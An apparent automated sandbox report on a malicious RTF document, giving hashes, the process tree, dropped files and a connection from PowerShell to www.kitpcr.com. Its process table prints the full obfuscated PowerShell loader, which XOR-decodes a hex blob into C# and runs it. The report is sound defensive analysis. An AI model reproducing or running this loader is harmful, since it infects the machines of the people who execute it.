File name: | COPY451223.doc |
Full analysis: | https://app.any.run/tasks/c822c027-49bd-46e5-be77-72ca481a3acf |
Verdict: | Malicious activity |
Analysis date: | September 19, 2019, 07:52:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | C5C703790F61135548961CB3B16D4DF0 |
SHA1: | 10255D5AC18E25CD5EAF9C757A5EFF2A0DAC19A6 |
SHA256: | DF9FD04955293472FAAFDBB2FF3163C4FD8916ABCD190F4884F6F453734325B2 |
SSDEEP: | 768:oZMrYyYDE+qR18d3ncYgIrffBKo8yRG9XUc4K9IQriN1Q/VuNU8f9/D/6HQIID7S:oZdRVXcirffa0hyH6D7vc64An1S |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3540 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\COPY451223.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2528 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2336 | powershell -WindowStyle Hidden function r8a21 { param($v3d2a) $dd717 = 'yccadbb';$g52f7ba = ''; for ($i = 0; $i -lt $v3d2a.length; $i+=2) { $zad526d = [convert]::ToByte($v3d2a.Substring($i, 2), 16); $g52f7ba += [char]($zad526d -bxor $dd717[($i / 2) % $dd717.length]); } return $g52f7ba; } $lbc469e = '0c100a0f034231001017040959170a0a0d0644311b0a17060c4a301717170a0c014c2b171706130b12311c111508070711421610080a05422a1a1015010f4c3d0a02060a0d110d0a00125f1711100d0441371b110d060e4f2d2d590c100a0f03423100101704094c2c1c17586c6e12171b0f0a0244010e181010410e01534a05183a200e0e300e130e16164a5b0806130a070e4a51414d210c160b1a330e0d0c1644412404103210160022050010070a1041483942120c010f080742110d021708074207011706130a422b171733151642171c5a5056054a2b171733151642084f565a55574e110d110a0f0342061f5b05594d59393d0f0f2809120d0b174b430f071017060f5256404e59260d15161b32160a0d15445f425b2f0c00002e0b1b1102131d404b24431314060e0b1a43101505160b1a43061910071017432a0f1032160b430b525d06074a4b1015160b0c1e4317045555531f524a5a3f260e152a0e110b101651410804160c071550514348422717171118340d0b17175e43320b100d16020d34100d0d060015464b3f59131603080b0159101700100b0159061b1501100c59010c0e0842071a0051054c2b0c0d331713440053185b5b4d312b0c0d331713441b511c01544d44170b171743195107531a5b4f410b171659160a0f1042161a0702594d59393d0f0f2809120d0b174b432f071017060f52564c06150f414d44270c0d111a310b0b0c0d5e4133100e2f1615062c010f0d0b1a414d4431070d2f02121027100b0c115c02030e0a064a3c44111618170a0244071a0d06110f44140d1007431851565b4c4b2a0f1032160b430e000055011b514f280a16320d1143110107571b4f0a0f10421618550157575b4b42131603080b0159101700100b01590a0d154406014b0600584c4b19300d1731101042155250005c5654595e4309575b061c504b135c0350484b41505c5207485353595003524f53065051404b50580a074c0e534a025b55525f5f300d173110104c2306110e4d190516170c4115035b4f07581c2d0c16291711410b04071d515054591707405054004c0e534a025b55524e10410251504c40514153065054525a4a5453505451534e51525052525549515356555240504a5808024a0d1f06075357575f442a0d15341610573906130b4b191e0c170e4413034055075a19372b171733151642081802575251075f51362a0f1032160b4a565a110b0c0d431b070753034f545e515f0b0451420602075006510c05040050514c4f09000556514c064f511c5652550c1615441a041a520257534b4b02040c150b4213185a55055f1f200017063a3942071b060650565f19491b505048521a1f054f511c5b5204582a0f1032160b431600010700442e0213170a03154d220d080d0131240f0e06030e51504a5a2903100a0b020d4a210d091a4b0406070748514f514817031c06014d574b5900565758514a0c1c1443280a16320d114b0e0207064b50564f300d2b171755554c4b49491b535155004b5516020401004e4a4a5810055b541d594336010021150a060f1042081c5b5155505f0c1c144336010021150a060f104a4b421017130d0c055901555357555f3c0d1508160d0c14060d154a25070d250c0d000710290217094c270c0f0a110e0a0f0717174d3214070110020f270b0e061c114d2014120e100002150d0d0c3d0217004d4940253f17050654515b481159055053514156565454531b5357434d59081c5b5155504c2616140d0d0b03063f0a0f044c105a18515249465353485452565553534e565b550057544857525555545618535a5106520648505351555156185352510053564d005251555a534e570752005354485552565553534852555353565a4c5651505150574951575507530148015357464b4e1b555152534b5929110c020111112a170213102b0c1f0c4315565b074b5e0d041342320b0c00041711310d0211152d0c04164b0157565155505833130b01070a104d321003100d4b17535d0750505811041017101743535a1912171b0f0a0244111618170a024411160b0a0d0644105a18515249171610100d04410954001a5b4a1a171610100d04410e54574057505c461b011a0207030640590a1711080a054211505a0501515f2a1711080a054c3c0e13151d590416114b080a1642105e535a0d5e0f4f0100594a2e07170417095f0b4944514a1a061b161c4316045d5155185e200e0a14070b174d350b201b0d064b0c520001414d30140611160b0a0d064c0b4e4b4a4f50524b5911505a05015149444b000905104b51160658575503593d430b52575b4d5038490d4d50504346410e54574057504f28070c1e170b3c4d591f0b061714160c4211505a05015159041e'; $lbc469e2 = r8a21($lbc469e); Add-Type -TypeDefinition $lbc469e2; [jc13f]::dc2ec9(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2836 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2628 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2440 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESADAB.tmp" "c:\Users\admin\AppData\Local\Temp\CSCADAA.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2996 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR99C4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2528 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA27E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2336 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O8W836EZVAW9SK4P2XF2.temp | — | |
MD5:— | SHA256:— | |||
2836 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVRAA6D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2836 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DFBD812B8422B46896.TMP | — | |
MD5:— | SHA256:— | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF9A59E89DBF6937A2.TMP | — | |
MD5:— | SHA256:— | |||
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCADAA.tmp | — | |
MD5:— | SHA256:— | |||
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.pdb | — | |
MD5:— | SHA256:— | |||
2440 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESADAB.tmp | — | |
MD5:— | SHA256:— | |||
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.dll | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2336 | powershell.exe | 162.241.128.67:443 | www.kitpcr.com | CyrusOne LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.kitpcr.com |
| suspicious |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|